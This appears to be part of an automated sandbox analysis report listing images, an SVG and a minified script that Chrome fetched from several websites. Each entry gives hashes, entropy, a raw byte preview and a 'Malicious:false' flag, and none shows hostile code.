                                              SSDEEP:192:4YNMtKwH5+NH4/l24SzSM4131MzEXYC8nTaJY7UoS5CMkAul:4YNg7ZRpjM4p2g9gTw1Tm
                                              MD5:C9E43841470571F45698123AB271FB11
                                              SHA1:FC0972F8CDB1AA5CF597BC428907A07A60CA767F
                                              SHA-256:5B43E833C948ED90DEBF68D63BF8F5FD6653D85EF463CEF7530EF2474C58AD62
                                              SHA-512:1DE56FD08F55719591BF98D756B316621BCD6FA38BCB205FE850A2135B2CF07F842C48D5A07D4BDA359BEE2C11146C5CBAFC60A73932FA7BF2E7ABA89EFE1EE0
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4398
                                              Entropy (8bit):7.943004888753446
                                              Encrypted:false
                                              SSDEEP:96:NU6Wx5epPk72qUow3byxikCkRafb83jJxjMwpTk8o09FyFe/on29Umc:GDxIpMvUB+xfCsaf43/IoVlCo/o29Umc
                                              MD5:623B1A29D70CC525C5F07AD9E68F2855
                                              SHA1:117F1628A0E2F5FFF305FC2D750EB4184233F948
                                              SHA-256:D83A79A2DD50E946CBAE5737F3021DC2606C2891B843D11332B76EA93C6ACDC1
                                              SHA-512:3316399E5C4D0F1B7B20C0831FB32F661046C9E375EAD1DDACEFF8B6317E258F6FDD37799D86C0AA6CD8D9A120B36F2788106656DDB689E14337C17DD0943B3C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/clients.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...PPLTE.............8N..n...2......c|.....,..................7R....."................\x....k...........7.w........s..g......4H..n.......'.......cz.....{......>W.....................c..*.....H........`..0........\.....9............]...<......j..D.........3F*..w.....5Tw.......evC.. ..3...AV.av.........^....T...x.{......D......IDATh..oo.J...2/..A.....4."...d.I..n....4.....c.o !iR.J...=m.d.y..?D..D.N.i].F.2*...Q.mK.Ti...u.tDTW.]..J%...|%T.L.Q.......1.$..<..<..!...SfS..L.}.c...C.(......<b..Pe.(.1....a.j....@..y..........R.iV5.C......6.......+ ..\.5.2L......6..P.&..=..*c..;E....\...]W{.qU.S+...}.B.Vo<..#8..~w..u..U.Py......I.5'..G}b..[...T...."..dU..r]...!......N.Mz<./....,.W ...TsUU./I...i.....s..>.*...9e.qi.A...ey....2*..........O7....C..FY.1..!6.$...(.*.t....wmWG.....:.B........1b....1I.~...!.<.#.Yi.R$PN.ei.n.0\..<..A..Uq4..U.AR.Y....{.5.L..a../eNPp.O...7.?.'.n.vu..HUK...4...~.....JU...z..YV'.BU..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):12708
                                              Entropy (8bit):7.596179989827188
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwcwxtSDlCf2scXBb27c2rQ2WSzT0K39fuY6bPMBjT7R/kCqBW:4YNg7DwJK2NXI7k2Ho0RBEW
                                              MD5:201B73BED71CD40FE3966F06FEB3DAEE
                                              SHA1:4BC7476C814550975AFFDBB260EF50C96104F398
                                              SHA-256:39166EF1235DA74E51ABEC5027C28CAEF16A3AC296F50CADA5E83A194789FA31
                                              SHA-512:D5367616D4DC52020F240B30C1AA84B67E388073E2A2DD77322DCA1F9906E32418ADF9CDBAC8B61834F224F86D9CFB4598F571FAEF1219405D3CA7191241A55C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/48/6fbed44ef1693e9e5230cf1bf9b6b06a.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):1389
                                              Entropy (8bit):7.8244372212417135
                                              Encrypted:false
                                              SSDEEP:24:XENh/toU+j9eFw/zXEE60/xj1QPPKbiXcT2DjhJoqUJ9kWNwkkaAaMD:XEb+kGz0E60HEPK2DjhaJaK2aMD
                                              MD5:3B0FBA1B1226A56579BB2DFECCCF4323
                                              SHA1:E0A33BE078833D4D40165C634FD4AEA896757593
                                              SHA-256:50A6ECD1929B19BC6EBFF042AC8945DC437A3A05F4BE3D23F3EDD63ADEDE1540
                                              SHA-512:99944DA82E9F294ABBBA56F8D36CC3A88234F5687C29F48B460365A53126DE586057A671D51720CC1CD5937C347C420D09DE92FA8F12FCCAB026C2A0B8EF2701
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/g-d-ad.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...EPLTEW....P..Q........&d....+g......h..1m...............~..E..%`....h..C;L.....IDATh....(..UD.........j.{....i..v....."X....];n..NH.x.'..W.+..;\..<.......<..D.oE=Qx..m.K.C..n.....%....l7.fa..\Nx.....a.[Q.....M..\.."...Zp...R.`v...A.&.y..RE!'M:+%.........P...&....>..P..@>..W.l...:.]:cF.2..nk..1<.3f.@._C...m[.R.1pr..*V5.-%<.bZ.]..!...u..L..f..hB....d.-.m.O.... F....V....O.8v..._.eW.4.Q.B}.g=a.=).....#..X.h..Fo.......1......r}.5Q.1.s#...0...&...K.a..>D=.b.....r............VR......y0.F<..p..' T;D ........&.7....d{.2.~a..8x2...!"B...p...'....Oy...=.I...'...<).....?|...W.&r..B"2..[?......*.....~..v.W.&{.8.........BTS.....{...+...t..t&3.Gt.P........Q..5..i....u<.,....X.d$H..\...&...+.."h.B..Zs.' <..i.&..4...t.;....i.A...@...d.......CJ....'!H..;.;O.t.........UaM..F"dH.A.m:C.. ..u..c.d#.#.Y4..OyR..-......{?9bW...@G. .N{D.].n.I.0....>Z.Td....]Z..t2.^..2....... ..9,.....h.!..j.uH8.AG.&U.+..!....\f....]......-2
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:downloaded
                                              Size (bytes):105759
                                              Entropy (8bit):7.98436647993728
                                              Encrypted:false
                                              SSDEEP:1536:XplzHOYB9Qz5sQmS/B4WFUpITgImWffyHmn1w2Tt6ZuecBS6y4Anye/Pv:ZB6zqe4+UpITDmWfam1wOngXnt
                                              MD5:A3DE0F294F6CD949B1E75B79371BF06B
                                              SHA1:F3F5A90D1ED39F26C703ED81A3A36E178A7CB0C7
                                              SHA-256:BEADAAC8AC49E4C8CD499619CC2D34C7DF62FF5B04714DAEF356FECA9E79CD66
                                              SHA-512:ECD0249BADE8FB79C74F0C0C52B7BC9C01AFD6AD2DEA58BC32F201DDF1FD2F0263014E7C71FBD023FF4C5DE3F5BA4B7ACA112B23AAA2BA13FAB5A0286A35DA08
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/services/6/c569183b81957ddaf8c75690a8cbfe28.jpg
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:48F32827934311ED9225BF14C06F67D5" xmpMM:DocumentID="xmp.did:48F32828934311ED9225BF14C06F67D5"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:48F32825934311ED9225BF14C06F67D5" stRef:documentID="xmp.did:48F32826934311ED9225BF14C06F67D5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............L....c..............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):15145
                                              Entropy (8bit):7.7013878152544395
                                              Encrypted:false
                                              SSDEEP:384:4YNg7z1yzRLaF+/rXLSuN+AjkkB7UBKJRaxnI:4YyP0zG+/zG6T5tUBKjUI
                                              MD5:01D5A06B513C43514BD7E54D762602CF
                                              SHA1:C2D64841032DDC51992CE973C4E92E6AADEC6DFD
                                              SHA-256:5C56397DD66E5A6AED32D7780B0CA6C89A98335C7CC616479DD38380876B0C73
                                              SHA-512:C262E8851F546413CA2B72E4F42C9C36D7ADB4A9DF42ED6F84383181E8771FA6D985295871276BC5913B087123782E183B1D436CCA8A0CAAA7E909B9D90034D4
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):14654
                                              Entropy (8bit):7.677629504656761
                                              Encrypted:false
                                              SSDEEP:384:4YNg72bmrXR56qw09ZHUStbTrw0aulHu9JOZsqD:4YyqqLR56leTVa8uoeS
                                              MD5:4733A5EA143B94A0EAFB2958B983B189
                                              SHA1:0ECB1F8C9DF6FC9285586941E62925AD07DCE05A
                                              SHA-256:F567AC6F16FC30D4B8FEE65866AF983063689612EF2903A1310CAA2FD505F6BC
                                              SHA-512:220EA277C2ED15117BA9D15C9B270327A6148C7B5BFF14A95CCF5DEEE3A3B98473045326A33DAE127620CE2814B29E6DC0A37DC2362AB40A6D135ADBA41EA70D
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                              Category:downloaded
                                              Size (bytes):530
                                              Entropy (8bit):7.2576396280117494
                                              Encrypted:false
                                              SSDEEP:12:6v/7OEUhUxzPKmghSn8nazyk+k8/OzxQcxNMvVb:bhUxzlvWkT8FcxK1
                                              MD5:88E0F42C9FA4F94AA8BCD54D1685C180
                                              SHA1:5AD9D47A49B82718BAA3BE88550A0B3350270C42
                                              SHA-256:89C62095126FCA89EA1511CF35B49B8306162946B0C26D6F60C5506C51D85992
                                              SHA-512:FAFF842E9FF4CC838EC3C724E95EEE6D36B2F8C768DC23E48669E28FC5C19AA24B1B34CF1DBCBE877B3537D6A325B4C35AF440C2B6D58F6A77A04A208D9296F8
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.gstatic.com/recaptcha/api2/audio_2x.png
                                              Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX...JBA.....E-R... (#..-*$.}.%.Kt.A..Dx.I...AF.Q.4.......-.6..?.m:.,.......Q..D.L..e4..2.D..8)j4:......&>.s......p?......9.o5>.][H.}...&L.%.xh{~K.J|.b..N..HMp....f.}dd..S..4%...$dK..!..Z..NNs.W&g..Fn....p...w..Ut...E\.e.......6......M.F...X.L......em.....R#'..%....j$/..-......@.l."..M.|....OtW.H.,.-.~W`Z.s8..W...B...C-.8"H....6......9...A..aO.1`.M..A..eA.{...-...U.,.W........IEND.B`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1159)
                                              Category:dropped
                                              Size (bytes):338712
                                              Entropy (8bit):5.61633684161754
                                              Encrypted:false
                                              SSDEEP:3072:o7Ay2hxnVV2GDbjq5ZfFMinfgbYeVjJ4gVp+6I7w7MyE9at9idYEH:okyo/2GHjq5ZfSbHVd42u7w7rEYtUSS
                                              MD5:91680884EED37B5ED4A53094296D6527
                                              SHA1:F3DF67A86E7B4C75F3C47F8E4EEF569CB2CE080F
                                              SHA-256:7B423B08E9EB0B19D9CE4B1E1F40B4EF0C00F40499FFFCE239FCA160BB07CFCF
                                              SHA-512:C3C0149DF32C9E40CF09DD0A37240935F26353A8402C6BCC6EDA3304FDE962A4E3D7B41F40CA3DE929AAF4F8B20F4812D97D2027E274284E84206E80F3BDECCD
                                              Malicious:false
                                              Reputation:low
                                              Preview:(function(){'use strict';var p;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var da=ca(this);function u(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.u("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}.function c(f,g){this.h=f;ba(this,"description",{configurable:!0,writable:!0,va
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3479
                                              Entropy (8bit):7.929772532023311
                                              Encrypted:false
                                              SSDEEP:96:oVrfRRPR+jQipCcAt4GIcMiEdB8a5JRHr:0bP53HMiPKJlr
                                              MD5:22B1B9A352C7EFF84D6FEB1A494DE899
                                              SHA1:EFD314530E3FEAB9D40D40B04DAC3DDBDD64422B
                                              SHA-256:C5F70EC03438DAED411CDF99C6CE8293F7B6DB8E2E453A293F7BDADC16598B1A
                                              SHA-512:9DE3135AE6426C94AC007CCB8619EDE380B86E962DBDB4676C78CA3DE8DE60ED45EA1FAAFE8375EDAE4CD982C0C8A9DDC986EF66FAF6B0D9FE5DEB8ACEF50727
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/oil-barrel.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...,PLTE.c#.........F;L......................a ....^!.....".w....TXk....]$....b..f.......e)....l.I?Q.................. ..........c..........l.@6H.^).d-....b....\`s...........$..&......MK\....g..[...../.`$........6/?.h4._....z................n...vy...}..9.o..........yJ.......o.L....@..^..B.qN.di....&IDATh..k[.\..A.........2.S.#(y.<e..k......^..if........u].....{..&..E./......|[....q..N...w .F..<..p.'5..1d....&....L..(..>............}.J........J...N.j.Nl.p......k .(<Qi.T...R..I."!r...p...."7&.@(......a ..".[.xx..Pk#q...{.~....._.U......r.B.;.a..p..~Ep....v.g..{..~:.z<....M!....eL..6C.x.&f..O..p.....A(>l..k.M.....T3....Vw...p..p.....1.....g..I...E....."..\.}%....).}.(....(~3..SM.,FC$v.... .b.[..<.<.q.f..j........A<..P..(.so.P..v%..]TzH.{A...xt..R..N...H.E.c..N..H.K...WrUrX...Y..dH......... .A..!..j....<;..r....Cw..h&C.3.J.Ul.r.H(.<..*..y.6.."i.~A]E......../h*1...9*..|.Q...WC-...w.o n.....rVJ.~........M..X...\\\..[@....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 300 x 300, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6626
                                              Entropy (8bit):7.845270033924381
                                              Encrypted:false
                                              SSDEEP:192:vO3E6dn4Xw6ynQGEnCgGvIYjFQAIJf/ic+okQz+kv:vaR4GdEnIIYjFQf5ac+okQD
                                              MD5:EE0261D9C9B8F73D47BB7626981D19F1
                                              SHA1:7AE8A013F17F4215E734A94CABF920CC274E608E
                                              SHA-256:305ECA09465003986701027861E1C0A218F7C0C68FCAEC71DCA9B5D2961D8CD3
                                              SHA-512:2310DF3747F634C2A90E20574B9F0B5D58AB3717459DE8AF27A91D324A9322A5D0E6EC8AD153FB41F0E881542C39864632D54036365EE6A1E2ACE31DF74A31BA
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/noon.png
                                              Preview:.PNG........IHDR...,...,.....N.~G....PLTEGpL........................................................................................................................................................................................................................................................................................................&..-..4xt9kh>a_AZXCUTEPOFNNGMMGONGSREWVD_]Bgd?so<.}6..0..(.. ................1ca@LLIGIJFFJGGJIIJTSEzv9....."...DEKJJJJJIlj=..".........FGJKKI\[C~z7..'......XWD.{7..$.....5.."..!........*]\B..-........2...RQF..$...zw8.....%......ec@`^B.....).....5qm<..... ol=..)..$...|x8nk=...hf?rn<..,..(.."...........+........+EFK.....)..3..1..3.|6ur:..*..'.....#.|6..#...ZXD..!yu9........b`A.....0...[ZC...QPF.......~6..'..-...........ws:.. ...IJJKJIMLG......................4......tRNS...'Hk.........6f......5..Q.....O...M+|..:...=..-..z.J......g..".0...8.?...................................................U.........................................n................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):41254
                                              Entropy (8bit):7.99292270454034
                                              Encrypted:true
                                              SSDEEP:768:IBXoy6MiVp0IjKepV72vFMnvAtwvQsC773gAu0a7vtl+zUxMyzq7D7wTr4UgHPgw:I4yxiwIjK4V25+oTs0ctYzUxMZ8UHoRu
                                              MD5:130689B88652C1A5ACC3198A51D02575
                                              SHA1:6062DE962A3FFBDD53CA1BAD27534A3E31D26C24
                                              SHA-256:0220EE73D2FA6CC7E5B89040A7014B24BEE25001F1A29348BCB6A8F26E9F2EFF
                                              SHA-512:564E62DDA8F9D28CDFD159C136DA243903BCA15B2C629B7786ECF978A40757A137B93801B8E102ECACCCD9209239BCE6AA977D2422C530D7D3DDB4A7FA343588
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 ....0....*....>.r.S.&..#tiy...gn.]..r.........x....E...9..g.?..O...(W.~....}|s...4......a..}?.0yn.X.E...!........{N..^N..._.~..x.?."....<...o....p{..7......_.t....G.>........_.g...qm.....ix5.wIXa..k.,..~.......f...TV.r..O..S]..7.]..o.]@)......!.q....xw.T..9f3.a..d....W..g......S..\.....ng.7#.....AN....Ae|....o.Y......%d.<...............O./g.....l.?.....q+s..c}:.q.......R.Yv....5z.x.%..~..@!u.*+Z.n.....{.Y........2......s......k..=..6...O.J.B.....TV..^..Q..,.J.%...y.....{8.l..&NH.Y.z..:.?..Bz...v.<.x.}zi.>.0.I$.......y..i...C.}...+..b.J]W:..".D.......[qB....o..-.zdL.l.......{..A.S.........U......#,.c.....-.kC..F.3!..!}h.#n.}.].@.}.S.RZ..f......&.7.y....7o?.......,%..{...z.C..}).}..s.....Ek.XKxNv.....W..n..x..Y...j#...II....kR.^..*\..l0W.M/W'.E.....C..%..T........Y...}=..r=...S...../....5(5r..B.-W..hI.X.....j....z.... ...N8..D..C\...%..J\c.(..k.Sx...-.3.....m6TX.b1.dE.5....'.q....s..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:downloaded
                                              Size (bytes):9888
                                              Entropy (8bit):5.150985435445677
                                              Encrypted:false
                                              SSDEEP:96:+85AitLhAfkLmAKFLkA9+LmAQHLdAjwuA+BLHAhaEAkzdA0jCAxKr+ACt7+A3sFk:jLpaqSN2zQB8rIM3vr9c/Z
                                              MD5:F6121B7C65684EEB2C8EC0DB0C639980
                                              SHA1:BFDBDEA6864F10AE42C0A5BABDDBF6DB01F413FF
                                              SHA-256:534C75D8EC6E9825ABCFC62206BE580B90C2896427D88B4081A8E79190066FF8
                                              SHA-512:D0EF2E2E15D0E379492E4A90A53AE2F4E9E41333C00DDA4BED7F87F06072850DFC414B1DAD59728F23FE24A14A9309412C77926E96909F13E70C6D334676EF1F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/hero/4/Group%208.svg
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="193.143" height="128.198" viewBox="0 0 193.143 128.198">. <defs>. <filter id="Rectangle_Copy_16" x="0" y="0" width="193.143" height="128.198" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>. <feGaussianBlur stdDeviation="3" result="blur"/>. <feFlood flood-opacity="0.161"/>. <feComposite operator="in" in2="blur"/>. <feComposite in="SourceGraphic"/>. </filter>. <filter id="Point_03" x="84" y="95.099" width="37" height="24" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>. <feGaussianBlur stdDeviation="3" result="blur-2"/>. <feFlood flood-opacity="0.161"/>. <feComposite operator="in" in2="blur-2"/>. <feComposite in="SourceGraphic"/>. </filter>. <filter id="Point_03_-_color" x="77" y="96.099" width="22" height="22" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):10295
                                              Entropy (8bit):7.943296651254659
                                              Encrypted:false
                                              SSDEEP:192:ZIIHUCD4wato8M+hftsxdlRjwFgoS1sly/2k2C+:f0wSo8MofclxwF5Es+2k2C+
                                              MD5:3B893BBE834C341F5FC174662D2BDB9D
                                              SHA1:72FC8FB7609EB9C2FC23A4C59FB82D5004716779
                                              SHA-256:916C10C678B8441363A9183ABDD12EBAAE52E6918FFCE25D6CCEE401AA40681F
                                              SHA-512:51371FD101E811F016B0BFFB334391E822B441FC38D5589281899D22F9E42DC9E3904A15BE43A692991AB733623B610F364FB0FAF067AEDD9387DEEC677B871D
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N.....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):5676
                                              Entropy (8bit):7.957804606600335
                                              Encrypted:false
                                              SSDEEP:96:S2NL+Cx2k/328beLmbtqwtNEcI6srHe0sJFFphRPUcFomfZe1VuU4qSA:SRCx2c328CLmbowLET6sLOBPFU4q5
                                              MD5:9F0A54078FAB7758E10137A2A745B042
                                              SHA1:B18A83C3B9C16465FAB3BDD5228EFF106098D733
                                              SHA-256:58AED1AB0084F4DF16930F9621046A024A52CF58D460FB7F181D74793AC07F9A
                                              SHA-512:4625BD50CEFC3CC90094BF94F4E5EA2E78846622D02D15203F83D5182A5D968072BA41712705B6122B206729BAEDE658585A4F9CCB7F2009F2E05EF69088B232
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/wordpress.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE..........q..y..s.....v...........n..|.....l........r..y........i..t..q.............A..S...{.,........z..>...b.f.....l..U........................-.[A...TIDATh.W.{.:.D...."D3...........^.(q.G....x....<&<.e..$.2..yj?..+.".....f...m.L......JR.0..4.<I....a..um.R4..0T.j].........a8^...0D.H.`.x...B...B.<.. .ns....A..R....,.|..i*... ...l.2!...i..A.TU......O.u?.J...J....!........p....m...<.....Eh...Hi.i........);...0..~......'.Mou...N..U.q..8F.1bn..2B....h.H@.....<vi6..Q.....^....8..s...."M..+....\0?....X=:J..v...\U}D.$..Z.2..%.*..y\..~.....U S.H....i.....Ya...4...r.b.....T.0w.s.\{K...&......}....moKp.8K..@.....#..FU........:!0...|.. ..WB.`..,c.t..3.AG......3.y=.P).R,+.s.H.=N....2.f.Eul$.y..a...*..U.T..,A........\.(...{J.p.ng..i....i.6.?@..i.1..D..l.]mU..nSJUXDN.....%,&.?.Rd...A....g.......Wzc<I.......#E...a[EE...*.c.K...U.i.D".V.nl._....h..u.4K.....J`8....p.$+*....O*.KP.....uQ..V...B.......*2r.mT.n'.R.r..bAsAEQ.B...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):21369
                                              Entropy (8bit):3.9066812167163114
                                              Encrypted:false
                                              SSDEEP:384:DvtTVt9XbRPxdsDvvpApAQMadC9zuf+31UiBbZ7cZYwO7AfR:Dvt5t9XbRbsDv6FSIiH7LK
                                              MD5:D0D327467EA4897F49D5165D19E901F6
                                              SHA1:976416D87A1A310A0163EABFCC4D183DA6FABEA3
                                              SHA-256:2C7F5107A6A503F88B4D25C90007DF598C0F9041AF387DA627DFCF991C68534A
                                              SHA-512:C35C8E09C800993F602C658B1B1DC1EADCF97D22BF84C4F3AD973ECF0FD4994CB99A74F4A54FC538A20B071FBEBE12C0520E24C766AA22DF9091E0F3E497D26A
                                              Malicious:false
                                              Reputation:low
